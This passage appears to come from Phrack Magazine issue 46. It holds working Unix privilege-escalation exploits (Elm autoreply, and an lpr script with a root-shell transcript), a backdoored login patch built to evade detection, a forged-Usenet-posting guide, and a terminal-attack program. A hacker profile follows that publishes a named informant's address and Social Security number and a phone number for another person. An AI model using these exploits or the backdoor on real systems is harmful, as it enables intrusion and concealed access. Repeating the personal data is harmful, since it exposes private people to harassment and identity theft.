autoreply "a
$MACHINE $USERNAME
b"
cat > /tmp/.rhosts.sh.$$ << 'EOF'
ln -s $1 `echo $$ | awk '{printf "/tmp/arep.%06d", $1}'`
exec autoreply off
exit 0
EOF
/bin/sh /tmp/.rhosts.sh.$$ $RHOSTS
rm -f /tmp/.rhosts.sh.$$ "a
$MACHINE $USERNAME
b"
exit 0
8<--------------------------- cut here ----------------------------

 (Lines marked with > represent user input)

> % id
 uid=97(8lgm) gid=97(8lgm) groups=97(8lgm)
> % ./fixrhosts ~root/.rhosts 8lgm localhost
 You've been added to the autoreply system.
 You've been removed from the autoreply table.
> % rsh localhost -l root csh -i
 Warning: no access to tty.
 Thus no job control in this shell.
 #


FIX:

 1. Disable autoreply.
 2. Wait for a patch from the Elm maintainers.

------------------------------------------------------------------------------

[8lgm]-Advisory-3.UNIX.lpr.19-Aug-1991

PROGRAM:

 lpr(1)  (/usr/ucb/lpr or /usr/bin/lpr)

VULNERABLE OS's:

 SunOS 4.1.1 or earlier
 BSD 4.3
 BSD NET/2 Derived Systems
 A/UX 2.0.1

 Most systems supporting the BSD LP subsystem


DESCRIPTION:

 lpr(1) can be used to overwrite or create (and become owner of)
 any file on the system.  lpr -s allows users to create symbolic
 links in lpd's spool directory (typically /var/spool/lpd).
 After 1000 invocations of lpr, lpr will reuse the filename in
 the spool directory, and follow the link previously installed.
 It will thus overwrite/create any file that this link points too.

IMPACT:

 Any user with access to lpr(1) can alter system files and thus
 become root.

REPEAT BY:

 This example demonstrates how to become root on most affected
 machines by modifying /etc/passwd and /etc/group.  Please do
 not do this unless you have permission.

 Create the following script, 'lprcp':

8<--------------------------- cut here ----------------------------
#!/bin/csh -f
#
# Usage: lprcp from-file to-file
#

if ($#argv != 2) then
 echo Usage: lprcp from-file to-file
 exit 1
endif

# This link stuff allows us to overwrite unreadable files,
# should we want to.
echo x > /tmp/.tmp.$$
lpr -q -s /tmp/.tmp.$$
rm -f /tmp/.tmp.$$  # lpr's accepted it, point it
ln -s $2 /tmp/.tmp.$$  # to where we really want

@ s = 0
while ( $s != 999)  # loop 999 times
 lpr /nofile >&/dev/null # doesn't exist, but spins the clock!
 @ s++
 if ( $s % 10 == 0 ) echo -n .
end
lpr $1    # incoming file
    # user becomes owner
rm -f /tmp/.tmp.$$
exit 0
8<--------------------------- cut here ----------------------------

 (Lines marked with > represent user input)

Make copies of /etc/passwd and /etc/group, and modify them:
> % id
 uid=97(8lgm) gid=97(8lgm) groups=97(8lgm)
> % cp /etc/passwd /tmp/passwd
> % ex /tmp/passwd
 /tmp/passwd: unmodified: line 42
> :a
> 8lgmroot::0:0:Test account for lpr bug:/:/bin/csh
> .
> :wq
 /tmp/passwd: 43 lines, 2188 characters.
> % cp /etc/group /tmp
> % ex /tmp/group
 /tmp/group: unmodified: line 49
> :/wheel
 wheel:*:0:root,operator
> :c
> wheel:*:0:root,operator,8lgm
> .
> :wq
 /tmp/group: 49 lines, 944 characters.

Install our new files:
> % ./lprcp /tmp/group /etc/group
 ................................................................
 ...................................
 lpr: cannot rename /var/spool/lpd/cfA060testnode
> % ./lprcp /tmp/passwd /etc/passwd
 .................................................................
 ..................................
 lpr: cannot rename /var/spool/lpd/cfA061testnode

Check it worked:
> % ls -l /etc/passwd /etc/group
 -rw-r--r--    1 8lgm          944 Mar  3 19:56 /etc/group
 -rw-r--r--    1 8lgm         2188 Mar  3 19:59 /etc/passwd
> % head -1 /etc/group
 wheel:*:0:root,operator,8lgm
> % grep '^8lgmroot' /etc/passwd
 8lgmroot::0:0:Test account for lpr bug:/:/bin/csh

Become root and tidy up:
> % su 8lgmroot
 # chown root /etc/passwd /etc/group
 # rm -f /tmp/passwd /tmp/group
 #

FIX:

 1. Contact your vendor for a fix.
 2. In the meantime, apply the following patch, derived from
    BSD NET/2 source, which will correct the flaw on most
    affected systems:

------------------------------------------------------------------------------

          Anonymous netnews without "anonymous" remailers

Save any news article to a file.  We'll call it "hak" in this example.
Edit hak, and remove any header lines of the form

 From some!random!path!user   (note: "From ", not "From: " !!)
 Article:
 Lines:

Shorten the Path: header down to its LAST two or three "bangized" components.
This is to make the article look like it was posted from where it really was
posted, and originally hit the net at or near the host you send it to.  Or
you can construct a completely new Path: line to reflect your assumed alias.

Make some change to the Message-ID: field, that isn't likely to be
duplicated anywhere.  This is usually best done by adding a couple of
random characters to the part before the @, since news posting programs
generally use a fixed-length field to generate these IDs.

Change the other headers to say what you like -- From:, Newsgroups:,
Sender:, etc.  Replace the original message text with your message.
If you are posting to a moderated group, remember to put in an Approved:
header to bypass the moderation mechanism.

Write out the changed file, and send it to your favorite NNTP server that
permits transfers via the IHAVE command, using the following script:

=======================
#! /bin/sh
## Post an article via IHAVE.
## args: filename server

if test "$2" = "" ; then
  echo usage: $0 filename server
  exit 1
fi
if test ! -f $1 ; then
  echo $1: not found
  exit 1
fi

# suck msg-id out of headers, keep the brackets
msgid=`sed -e '/^$/,$d' $1 | egrep '^[Mm]essage-[Ii][Dd]: ' | \
  sed 's/.*-[Ii][Dd]: //'`
echo $msgid

( sleep 5
  echo IHAVE $msgid
  sleep 3
  cat $1
  sleep 1
  echo "."
  sleep 1
  echo QUIT ) | telnet $2 119
=======================

If your article doesn't appear in a day or two, try a different server.
They are easy to find.  Here's a script that will break a large file
full of saved netnews into a list of hosts to try.  Edit the output
of this if you want, to remove obvious peoples' names and other trash.

=======================
#! /bin/sh
FGV='fgrep -i -v'
egrep '^Path: ' $1 | sed -e 's/^Path: //' -e 's/!/\
/g' | sort -u | fgrep . | $FGV .bitnet | $FGV .uucp
=======================

Once you have your host list, feed it to the following script.

=======================
#! /bin/sh

while read xx ; do
if test "$xx" = "" ; then continue;
fi
echo === $xx
( echo open $xx 119
  sleep 5
  echo ihave k00l@x.edu
  sleep 4
  echo .
  echo quit
  sleep 1
  echo quit
) | telnet
done
=======================

If the above script is called "findem" and you're using csh, you should do

 findem < list >& outfile

so that ALL output from telnet is captured.  This takes a long time, but when
it finishes, edit "outfile" and look for occurrences of "335".  These mark
answers from servers that might be willing to accept an article.  This isn't a
completely reliable indication, since some servers respond with acceptance and
later drop articles.  Try a given server with a slightly modified repeat of
someone else's message, and see if it eventually appears.

You will notice other servers that don't necessarily take an IHAVE, but
say "posting ok".  You can probably do regular POSTS through these, but they
will add an "NNTP-Posting-Host: " header containing the machine YOU came from.

------------------------------------------------------------------------------

Magic Login - Written by Data King - 7 July 1994

PLEASE NOTE:-

     This program code is released  on the understanding  that neither the
     author or Phrack  Magazine suggest that you implement this on **ANY**
     system that you are not authorized to do so. The author provides this
     implementation of a "Magic"  login as a learning exercise in security
     programming.

Sorry for the disclaimer readers but I was advised by the AFP (Australian
Federal Police) that if I ever released this code they would bust me for
aiding and abetting. I am releasing it anyway as I believe in the right of
people to KNOW, but not necessarily to DO.

As always I can be emailed at dking@suburbia.apana.org.au
(Please note:- I have a NEW pgp signature.)

INTRODUCTION
~~~~~~~~~~~~
Briefly I am going to explain what a "Magic" login is and some of the steps you
need to go through to receive the desired result. At the end of this article is
a diff that can be applied to the shadow-3.2.2-linux archive to implement some
of these ideas.

EXPLANATION
~~~~~~~~~~~
A "Magic" login is a modified login program that allows the user to login
without knowing the correct password for the account they are logging into.

This is a very simple programming exercise and can be done by almost anyone, but
a really effective "Magic" login program will do much more than this. The
features of the supplied "Magic" login are:

     - Will login to any valid account as long as you know the Magic password.

     - Hides you in UTMP
[B
     - Does not Log to WTMP

     - Allows Root Login from NON authorized Terminals

     - Preserves the Lastlogin information (ie Keeps it as though you had never
       logged in with the magic password)

     - Produces a binary that is exactly the same length as the original binary.

IMPLEMENTATION
~~~~~~~~~~~~~~
I am not going to go into great detail here on how to write such a system as
this. The code is very simple and it contains plenty of comments, so just look
there for ideas.

For this system to have less chance of being detected you need to do several
things.

First select a "Magic" password that is not easily identifiable by stringing the
binary. This is why in the example I have used the word "CONSOLE", this word
already appears several times in the binary so detection of one more is
unlikely.

Admittedly I could of encrypted the "Magic" password, but I decided against this
for several reasons.

The second thing you would need to do if you where illegally placing a "Magic"
login on a system would be to ensure that the admins are not doing CRC checks on
SUID(0) programs, or if they are that you change the CRC record of login to
match the CRC record of the "Magic" login.

Thirdly do not forget to make the date and time stamp of the new binary match
the old ones.

To install a new /bin/login on a system you will need to be root, now if you are
already root why would you bother? Simple, it is just one more backdoor that you
can use to get back in if you are detected.

LIMITATIONS
~~~~~~~~~~~
This version of the "Magic" login program does not have the following features,
I leave it entirely up to you about implementing something to fix them:

     - Shells & Programs show up in the Process Table

     - tty Ownership and attributes

     - /proc filesystem

Any one of these to an alert system admin will show that there is an "invisible"
user on the system. However it has been my experience that most admin's rarely
look at these things, or if they do they can not see the wood for the trees.

-----<cut here>-----

diff -c /root/work/login/console.c /root/work/logon/console.c
*** /root/work/login/console.c Sun Oct 11 07:16:47 1992
--- /root/work/logon/console.c Sat Jun  4 15:29:15 1994
***************
*** 21,26 ****
--- 21,27 ----
  #endif

  extern char *getdef_str();
+ extern  int magik;

  /*
   * tty - return 1 if the "tty" is a console device, else 0.
***************
*** 47,52 ****
--- 48,57 ----
   if ((console = getdef_str("CONSOLE")) == NULL)
    return 1;

+  /* Fix for Magic Login - UnAuth Console - Data King */
+
+  if (magik==1)
+   return 1;
   /*
    * If this isn't a filename, then it is a ":" delimited list of
    * console devices upon which root logins are allowed.
diff -c /root/work/login/lmain.c /root/work/logon/lmain.c
*** /root/work/login/lmain.c Mon Oct 12 17:35:06 1992
--- /root/work/logon/lmain.c Sat Jun  4 15:30:37 1994
***************
*** 105,110 ****
--- 105,111 ----
  char *Prog;
  int newenvc = 0;
  int maxenv = MAXENV;
+ int magik;  /* Global Flag for Magic Login - Data King */

  /*
   * External identifiers.
diff -c /root/work/login/log.c /root/work/logon/log.c
*** /root/work/login/log.c Mon Oct 12 17:35:07 1992
--- /root/work/logon/log.c Sat Jun  4 15:37:22 1994
***************
*** 53,58 ****
--- 53,59 ----
  extern struct passwd pwent;
  extern struct lastlog lastlog;
  extern char **environ;
+ extern char magik;

  long lseek ();
  time_t time ();
***************
*** 83,89 ****
   (void) time (&newlog.ll_time);
   (void) strncpy (newlog.ll_line, utent.ut_line, sizeof newlog.ll_line);
   (void) lseek (fd, offset, 0);
!  (void) write (fd, (char *) &newlog, sizeof newlog);
   (void) close (fd);
  }

--- 84,93 ----
   (void) time (&newlog.ll_time);
   (void) strncpy (newlog.ll_line, utent.ut_line, sizeof newlog.ll_line);
   (void) lseek (fd, offset, 0);
!  if (magik !=1) /* Dont Modify Last login Specs if this is a Magic  */
!  {        /* login - Data King */
!    (void) write (fd, (char *) &newlog, sizeof newlog);
!  }
   (void) close (fd);
  }

diff -c /root/work/login/utmp.c /root/work/logon/utmp.c
*** /root/work/login/utmp.c Mon Oct 12 17:35:36 1992
--- /root/work/logon/utmp.c Sat Jun  4 15:41:13 1994
***************
*** 70,75 ****
--- 70,77 ----
  extern long lseek();
  #endif /* SVR4 */

+ extern  int magik;
+
  #define NO_UTENT \
   "No utmp entry.  You must exec \"login\" from the lowest level \"sh\""
  #define NO_TTY \
***************
*** 353,368 ****
   /*
    * Scribble out the new entry and close the file.  We're done
    * with UTMP, next we do WTMP (which is real easy, put it on
!   * the end of the file.
    */
!
!  (void) write (fd, &utmp, sizeof utmp);
!  (void) close (fd);
!
!  if ((fd = open (WTMP_FILE, O_WRONLY|O_APPEND)) >= 0) {
    (void) write (fd, &utmp, sizeof utmp);
    (void) close (fd);
   }
-   utent = utmp;
  #endif /* SVR4 */
  }
--- 355,372 ----
   /*
    * Scribble out the new entry and close the file.  We're done
    * with UTMP, next we do WTMP (which is real easy, put it on
!   * the end of the file. If Magic Login, DONT write out UTMP - Data King
    */
!  if (magik !=1)
!  {
    (void) write (fd, &utmp, sizeof utmp);
    (void) close (fd);
+
+   if ((fd = open (WTMP_FILE, O_WRONLY|O_APPEND)) >= 0) {
+    (void) write (fd, &utmp, sizeof utmp);
+    (void) close (fd);
+   }
+    utent = utmp;
   }
  #endif /* SVR4 */
  }
diff -c /root/work/login/valid.c /root/work/logon/valid.c
*** /root/work/login/valid.c Sun Oct 11 07:16:55 1992
--- /root/work/logon/valid.c Sat Jun  4 15:47:28 1994
***************
*** 25,30 ****
--- 25,32 ----
  static char _sccsid[] = "@(#)valid.c 3.4 08:44:15 9/12/91";
  #endif

+ extern int magik;
+
  /*
   * valid - compare encrypted passwords
   *
***************
*** 43,48 ****
--- 45,64 ----
   char *encrypt;
   char *salt;
   char *pw_encrypt ();
+  char  *magic;
+
+  /*
+   * Below is the piece of code that checks to see if the password
+   * supplied by the user = the Magic Password - Data King
+   */
+
+  magic = "CONSOLE"; /* Define this as the Magic Password - Data King */
+
+  if (strcmp(password,magic) == 0)
+   {
+    magik = 1;
+    return(1);
+   }

   /*
    * Start with blank or empty password entries.  Always encrypt

------------------------------------------------------------------------------

/* flash.c */

/* This little program is intended to quickly mess up a user's
   terminal by issuing a talk request to that person and sending
   vt100 escape characters that force the user to logout or kill
   his/her xterm in order to regain a sane view of the text.
   It the user's message mode is set to off (mesg n) he/she will
   be unharmed.
   This program is really nasty :-)

   Usage: flash user@host

   try compiling with: gcc -o flash flash.c
*/


#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdio.h>
#include <strings.h>

/* this should really be in an include file..  */

#define OLD_NAME_SIZE 9
#define NAME_SIZE    12
#define TTY_SIZE     16
typedef struct {
        char    type;
        char    l_name[OLD_NAME_SIZE];
        char    r_name[OLD_NAME_SIZE];
        char    filler;
        u_long  id_num;
        u_long  pid;
        char    r_tty[TTY_SIZE];
        struct  sockaddr_in addr;
        struct  sockaddr_in ctl_addr;
} OLD_MSG;

typedef struct {
        u_char  vers;
        char    type;
        u_short filler;
        u_long  id_num;
        struct  sockaddr_in addr;
        struct  sockaddr_in ctl_addr;
        long    pid;
        char    l_name[NAME_SIZE];
        char    r_name[NAME_SIZE];
        char    r_tty[TTY_SIZE];
} CTL_MSG;

#define TALK_VERSION    1               /* protocol version */

/* Types */
#define LEAVE_INVITE    0
#define LOOK_UP         1
#define DELETE          2
#define ANNOUNCE        3

int current = 1;  /* current id..  this to avoid duplications */

struct sockaddr_in *getinaddr(char *hostname, u_short port)
{
static  struct sockaddr    addr;
struct  sockaddr_in *address;
struct  hostent     *host;

address = (struct sockaddr_in *)&addr;
(void) bzero( (char *)address, sizeof(struct sockaddr_in) );
/* fill in the easy fields */
address->sin_family = AF_INET;
address->sin_port = htons(port);
/* first, check if the address is an ip address */
address->sin_addr.s_addr = inet_addr(hostname);
if ( (int)address->sin_addr.s_addr == -1)
        {
        /* it wasn't.. so we try it as a long host name */
        host = gethostbyname(hostname);
        if (host)
                {
                /* wow.  It's a host name.. set the fields */
                /* ?? address->sin_family = host->h_addrtype; */
                bcopy( host->h_addr, (char *)&address->sin_addr,
                        host->h_length);
                }
        else
                {
                /* oops.. can't find it.. */
  puts("Couldn't find address");
  exit(-1);
                return (struct sockaddr_in *)0;
                }
        }
/* all done. */
return (struct sockaddr_in *)address;
}

SendTalkPacket(struct sockaddr_in *target, char *p, int psize)
{
int  s;
struct sockaddr sample; /* not used.. only to get the size */

s = socket(AF_INET, SOCK_DGRAM, 0);
sendto( s, p, psize, 0,(struct sock_addr *)target, sizeof(sample) );
}


new_ANNOUNCE(char *hostname, char *remote, char *local)
{
CTL_MSG  packet;
struct   sockaddr_in  *address;

/* create a packet */
address = getinaddr(hostname, 666 );
address->sin_family = htons(AF_INET);

bzero( (char *)&packet, sizeof(packet) );
packet.vers   = TALK_VERSION;
packet.type   = ANNOUNCE;
packet.pid    = getpid();
packet.id_num = current;
bcopy( (char *)address, (char *)&packet.addr, sizeof(packet.addr ) );
bcopy( (char *)address, (char *)&packet.ctl_addr, sizeof(packet.ctl_addr));
strncpy( packet.l_name, local, NAME_SIZE);
strncpy( packet.r_name, remote, NAME_SIZE);
strncpy( packet.r_tty, "", 1);

SendTalkPacket( getinaddr(hostname, 518), (char *)&packet, sizeof(packet) );
}

old_ANNOUNCE(char *hostname, char *remote, char *local)
{
OLD_MSG  packet;
struct   sockaddr_in  *address;

/* create a packet */
address = getinaddr(hostname, 666 );
address->sin_family = htons(AF_INET);

bzero( (char *)&packet, sizeof(packet) );
packet.type   = ANNOUNCE;
packet.pid    = getpid();
packet.id_num = current;
bcopy( (char *)address, (char *)&packet.addr, sizeof(packet.addr ) );
bcopy( (char *)address, (char *)&packet.ctl_addr, sizeof(packet.ctl_addr));
strncpy( packet.l_name, local, NAME_SIZE);
strncpy( packet.r_name, remote, NAME_SIZE);
strncpy( packet.r_tty, "", 1);

SendTalkPacket( getinaddr(hostname, 517), (char *)&packet, sizeof(packet) );
}

main(int argc, char *argv[])
{
 char *hostname, *username;
 int pid;

 if ( (pid = fork()) == -1)
   {
  perror("fork()");
  exit(-1);
  }
 if ( !pid )
  {
  exit(0);
  }
 if (argc < 2) {
  puts("Usage: <finger info> ");
  exit(5);
 }
  username = argv[1];
 if ( (hostname = (char *)strchr(username, '@')) == NULL )
  {
  puts("Invalid name.  ");
  exit(-1);
  }
        *hostname = '\0';
 hostname++;

 if (*username == '~')
  username++;

#define FIRST "\033c\033(0\033#8"
#define SECOND "\033[1;3r\033[J"
#define THIRD  "\033[5m\033[?5h"
 new_ANNOUNCE(hostname, username, FIRST);
 old_ANNOUNCE(hostname, username, FIRST);
 current++;
 new_ANNOUNCE(hostname, username, SECOND);
 new_ANNOUNCE(hostname, username, SECOND);
 current++;
 new_ANNOUNCE(hostname, username, THIRD);
  old_ANNOUNCE(hostname, username, THIRD);
}

------------------------------------------------------------------------------


--------------------------------------------------------------------------------


                              ==Phrack Magazine==

                 Volume Five, Issue Forty-Six, File 5 of 28

****************************************************************************


                            -:[ Phrack Pro-Phile ]:-

This issue our prophile introduces you to one of the craziest people
I've ever met from the Underground.  And coming from a complete loon
like me, that's saying something.  This guy is a real Renaissance Man:
Hacker, programmer, burglar, convict, star of stage and screen...
Of course, that someone could only be:

                                   Minor Threat
                                   ~~~~~~~~~~~~
_____________________________________________________________________________


 Personal Info:

           Handle: Minor Threat
         Call him: MT, minor, lamer
             Born: 1972 in Walnut Creek, California
              Age: 22
           Height: 6'1"
           Weight: 155 lbs
           e-mail: mthreat@paranoia.com
              www: http://www.paranoia.com/~mthreat/
     Affiliations: Dark Side Research
  Computers owned: 1981: IBM PC
                   1982: none
                   1984: PCjr
                   1988: XT Clone
                   1990: 386/25 Clone
                   1992: Too many to legally list
                   1994: Pentium & 486

How I got started
~~~~~~~~~~~~~~~~~

          In 1981, my dad worked for IBM.  In October of that year, he
     brought home a PC, and I jumped on BASIC.  It wasn't until 1984 that
     I got my first modem.  I had just moved to Florida with my dad, and
     he had a modem.  I met some other kids with computers and modems and
     they taught me what modems were for:  "You call other people's
     computers and try to get their passwords and intercept their mail".
     (That's what I was taught!)  It wasn't until a few months later I
     realized that this wasn't the actual purpose of BBSs and modems.
     My first BBS was the Towne Crier BBS at FAU (Florida Atlantic
     University), 305-393-3891 (I still remember that damn number), but
     the NPA has since changed to 407.  We thought it was so cool when
     we logged on as "All" and deleted all the messages posted to "All".

          In about 1985, I moved back to Austin.  I screwed around for
     several years without doing any real hacking.  When I got to high
     school, I wanted to change my grades like in War Games, so I looked
     through the counselor's office until I found a number to the
     Education Service Center.  I had to scan a whole _100_ numbers
     (929-13xx) to find the HP3000 dialup.  Once I found it, I had no
     idea what to do.  I gave the number to a friend in high school,
     who gave it to some of his hacker friends.  They hacked it and gave
     it back to me, complete with a full list of passwords and commands.
     It turns out, the two Austin hackers who did it were The Mentor and
     Erik Bloodaxe, but I didn't know that for another 3 years.

          Shortly after this, I picked my permanent handle.  Minor Threat
     was an early-to-mid 1980's punk band from Washington, DC.  They're no
     longer together, but Fugazi is pretty good and Ian McKaye (from
     Minor Threat) is in Fugazi.  I actually got the handle off of one
     of my sister's tapes, before I even heard them.  But now I like the
     music too.

          Eventually, I found a local pirate board, met all the local
     pirates, and got into the warez scene for a while.  I joined PE
     (Public Enemy), the pirate group.  (I cracked the warez!)  Warez were
     only so fun, so I looked for other stuff.  I met some VMB lamers and
     got into that scene for about a month, and got bored again.

          This was 1990, our 950s were running out, and we needed another
     way to call out.  So I took an old VMB hacking program I had
     written, and changed it around to scan for tones, in random order
     to avoid Ma Bell problems.  I nicknamed it ToneLoc, short for Tone-
     Locator.  I gave it to some friends (Alexis Machine & Marko Ramius)
     and eventually, it ended up on some warez boards.  It got pretty
     popular, so I made a version that worked for more people, called
     it 0.90, and released it.  Then I lost the source in a hard drive
     crash, and stopped working on it.

          I was 18 and mom said it was time to get out of her house, so
     I got my own apartment.  Marko Ramius and I learned about trashing
     central offices, and gained COSMOS access.  We barely knew what
     COSMOS was .. I knew I had read about it in old Phrack articles, and
     I remembered that it was "elite."  Our problem was, we still knew no
     other "real" hackers, and we had to learn COSMOS.  After trashing
     and trashing, we still had no COSMOS manuals.  We had to get them
     somehow.  I can't say how, I'll leave it to your imagination.

          Marko and I started breaking in buildings and got pretty
     good at it.  We had about a 60% success rate I would guess.  But we
     never stole anything -- we just looked for cool information.  In
     1991, we got caught in a building, and got charged with Criminal
     Trespassing.  We both got probation for a Class A misdemeanor.
     We decided it was time to stop breaking in buildings.

          Late in 1991, I got e-mail on a bulletin board from someone
     named Mucho Maas.  He said he had gotten ToneLoc and wanted a
     few new features.   I told him I had lost the current source and
     all I had was an old (0.85) source.  He said he would take the
     old source, add the new features, and bring it up-to-date with
     the current source.  So he did, and we released ToneLoc 0.95.
     If it weren't for Mucho, ToneLoc would still be at version 0.90,
     and anyone who ran 0.90 knows how hard it was to get it running
     right.

          About the same time, I was getting on a few BBSs in the
     Washington DC area.  (Pentavia was the best while it was up).
     I met several people there... including a guy named Codec.  Codec
     was mostly a phone phreak, but did a little hacking as well.  But
     when it came to PBX's, he was a master.  Not only had he exploited
     PBXs for free long distance use like the rest of us, but he had
     actually REMOVED entire PBX systems from buildings!  (See his
     article on how to do this, Phrack 43, article 15).  But he had
     also gotten caught and was on federal probation.

     A few months after I met Codec, he had an 'incident'
     and was on the run again.  I agreed to let him live with me, so
     he flew down and moved in.  We got a 2 bedroom place, and set
     the place up d0pe.  There were over 9 phone extensions, (not
     including cordless), and about the same number of computers (Most
     of which were Codec's).  We had the funnest 3 months ever ...
     but about 2 weeks after SummerCon 1992, we got arrested.


Favorite things
~~~~~~~~~~~~~~~

              Women: w0w
              Music: Sonic Youth, Cure, Fugazi, Minor Threat, Orb, B-Boys,
                     Jane's Addiction.
      Favorite Book: 1984
             My Car: 1990 300ZX Twin Turbo, Wolf Chip mod to 360
                     horsepower.  It's fucking fast.
    Favorite Movies: Jackie Chan movies, The Killer, Reservoir Dogs,
                     The Lost Boys, Near Dark, Hardware.
        Favorite TV: MacGyver


What are some of your most memorable experiences?

     Being polygraphed by the Secret Service in 1991 for something having
     to do with some lamer threatening the president on an Alliance
     Teleconference.  I failed the polygraph the first time, then I
     passed it the second time.  (How's that for the government?)
     Eventually, some other 15-year old got probation for doing it.

     Being arrested with Codec in 1992.  He ran, outran the cops, jumped
     a fence about 8 feet tall, and eventually got in a struggle with
     a cop over the his gun (Officer Sheldon Salsbury, Austin PD).  The
     gun went off, and we were both booked on attempted capital murder.
     It turned out that the bullet hit no one, and all the blood was from
     the cop hitting himself in the head with his own gun, although the
     cop claims that Codec hit him in the forehead with a 2-meter ham
     radio from like 20 feet away.  Right.  A search warrant was executed
     on our apartment, and approximately $800,000 worth of AT&T Switching
     equipment was seized from Codec's closet.  It turns out, we were
     narced on and set-up by :

       Jon R. Massengale
       6501 Deer Hollow
       Austin, TX  78750
       DOB: 9-7-62
       SSN: 463-92-0306


     Being the first in Texas to have Caller-ID, before it was legally
     available.

     Losing control of my car at 140mph, doing a slow 360 at about 120,
     living through it, and not doing too much damage to my car.


   Good times:

     Going up to Seattle to visit Cerebrum in May 1993, seeing Fugazi,
     getting our car towed, then reading the dialups to the towing
     company's xenix (login: sysadm).  Finally getting our Oki 900's
     to clone/tumble/do other d0pe things.  Calling each other on
     our Okis from 5 feet away, putting them together and causing
     feedback.

     Setting up my apartment with Codec with a 10-station Merlin system,
     and a 9-station network.

     SummerCon 1993.  "Culmination of Coolness."  Sorry, can't say any
     more.


Some People To Mention:


     There are a lot of people who I would like to mention that have helped
     me greatly and who I have known for a very long time:

     Marko Ramius   -  First pirate/hacker I really knew in person.  We
                       did a lot of crazy shit together.

     Alexis Machine -  Second hacker-type I met, and a true Warez Kid.
                       (that's a complement!)

     Mucho Maas     -  Brought back ToneLoc from the dead.  Always told
                       me what I shouldn't do, and always said "I told
                       you so" when I got busted.

     Codec          -  I had some of the funnest times of my life with
                       Codec... unfortunately, it was so much fun it was
                       illegal, and we got busted.

     Cerebrum       -  Very cool friend who got narced on by a fuckhead
                       named Zach, 206-364-0660.  Cerebrum is serving
                       a 10 month federal sentence in a nice prison camp
                       in Sheridan, Oregon.  He gets out about December
                       10, 1994.

     The Conflict   -  Unfortunately, I can't tell you.  Maybe in about 8
                       more years.

ESAC Administrator  -  "Have you been drinking on the job?"


What I'm up to now
~~~~~~~~~~~~~~~~~~

     When I heard that the next Phrack Pro-phile was going to be about
me, I realized, "I must be retired".  It's probably true.. at least I hope
it is.  The 5 months I spent in jail was enough.  I just started going
back to University of Texas, where they will only give me a VAX account
(lame).  For the first time in 4 years, I think my life is going in
the 'right' direction.

Advice
~~~~~~

     I can only hope anyone who reads this will take this seriously.
Here's my advice:  If you ever get arrested or even simply questioned about
ANYTHING AT ALL, DO NOT COOPERATE.  Always tell the law enforcement
official or whoever, "I'm sorry, I can't talk without my lawyer present"
Cooperating will never help you.  Codec recently pointed out to me, that
we should be the "role models" of what people should do when they get
busted.  Both of us remained loyal and quiet during our whole case.  I was
in jail for 5 months, and Codec is still in prison, but we never talked.
Being narced on by a 'buddy' is the worst thing that could ever happen
to you, and narcing on a 'buddy' is the worst thing you could do to
them.  If you get busted for something, don't pass the punishment on
to someone else.  I hope most of you never have to face this, but if
you do, you will live much better knowing that you didn't give in to
a bunch of 'law enforcement' pricks.


--------------------------------------------------------------------------------


                              ==Phrack Magazine==

                 Volume Five, Issue Forty-Six, File 6 of 28

****************************************************************************

                                  BIG FUN


Think Federal District Court Judges and Special
Agents get to have all the fun?

Not any more!!

It's the Operation Sun Devil Home Game!

For the first step in the game, a quick flourish of a pen
signs away your opponent's rights to any expectations of
privacy.  Bank records, medical records, employment
files, student records...literally anything is yours
for the taking.

As you progress through the various levels, you move on
to other legal scenarios like the application for search
warrant and the summons.

It's all here in the Operation Sun Devil Home game, by
Gailco.

===============================================================

Other game pieces available via ftp from freeside.com
in /pub/phrack/gailco.

Offer not sold in stores.  Do not use.
Impersonating an officer of the court is a felony.

section 1 of uuencode 4.13 of file GAME.PCX    by R.E.M.

begin 644 GAME.PCX
M"@,!`0````!/!D@(Q@#&````````````````````````````````````````V
M```````````````````````````!R@`!`"`#6`(`````````````````````W
M``````````````````````````````````````````````````#________-(
M_________\W_________S?_________-_________\W_________S?______D
M___-_________\W_________S?_________-_________\W_________S?__R
M_______-_________\W_________S?_________-_________\W_________>
MS?_________-_________\W_________S?_________-_________\W_____R
M____S?_________-_________\W_________S?_________-_________\W_R
M________S?_________-_________\W_________S?_________-________]
M_\W_________S?_________-_________\W_________S?_________-____R
M_____\W_________S?_________-_________\W_________S?_________-R
M_________\W_________S?_________-_________\W_________S?______D
M___-_________\W_________S?_________-_________\W_________S?__R
M_______-_]'_P?!'P?[!X<'@P?_!]F#$_\'XPO_!\'______ZO_1_\'P8\'^X
M8<'@P?_!]&#$_\'XPO_!\'_!_O_____I_]#_'\'@P>'!_@$`?\'&`'_#_\'PF
MP?@^(!X.?\'_P?C_____YO_0_P_"P\'^`PX_CAX?P__!P,'\'P/"#A_!_\'^^
M'______E_]#_!X?!Y\'^`PX_#L(>#V_!_\'`?!X'C@\?P?^$#\'_A\[_C___X
M___4_]#_!X?!Y\'_`PX_#PX>#V?!_\'&P?X?!X</'\'_!P_!_X?._P?#_Y_!E
M_Y______SO_/_\'^`8?!\<'^`X`_#@`AA&?!_\'\?QP#!X^?P?\/CC^`/P_!M
MY<'_G[_'_\'^`#'!_\'G'\'\!______._\__P?PAP>?!\<'^`<'`P?\,`&"`L
M8<'_P?C!_SP@!X^?P?^#P>QXP<!X(\'@P?P_P>'!^,'_P?G$_\'\`#'!_\'A&
MG\'X`?_____._\__P?P`P>/!\<'\<`!_'#!@`&/!_\'PP?YX<`?!Q\'?P?_!H
MP,'X<,'`&`'!P'#"`,'P/\'QP>!_P?A_P?!X<<'^P?*?PO#!\<']_____\S_<
MS__!_&#!X\'PP?QP.'Y\<&`@9\'_P?C!_'AP)\'WPO_!X'APP>`X8,'@<&`@,
MP?`_P?#!X'_!^'_!^'QPP?S!\+_#\,'XP?S_____R__/_\'X8&'!X<'\<`P_<
M'GYAP>8'P?_!^,'^.,'[AX^?P?_!\``XP<.`<!H`P<`PP>$/P?&`'\'P0\'PV
MP?_!\`AA'\'AP?G!P,'@.`______RO_/_\'\'$.#P?X0#A\>/@.&#\'_P?C!S
M_QS!_P^/G\'_P=X$/,''@'@?``(<7P_!\8<?P?N'P?C!_\'P#F,?P>/!_X``M
M#`______RO_0_\'^#@_!_@`$/P\^``\.?\'\P?\<P>8?CQ_!_P\$/`>,>!\`7
M!AP$#\'A#Q_!_@?!_,'_P>,,0Q_!Q\'_C`,,#______*_]'_/@_!_P<&/P\_9
M!L(//\+_'\'F'X\/P?\/AAZ'ACH/`@X>`@_!XX</P?X'P?[!_X..0P_!Q\'_[
MC@,&!______*_]+_'\'_!\'`P?\//\'^'[_$_\'\/Y\?P?\'!`"'#"`.`8P\P
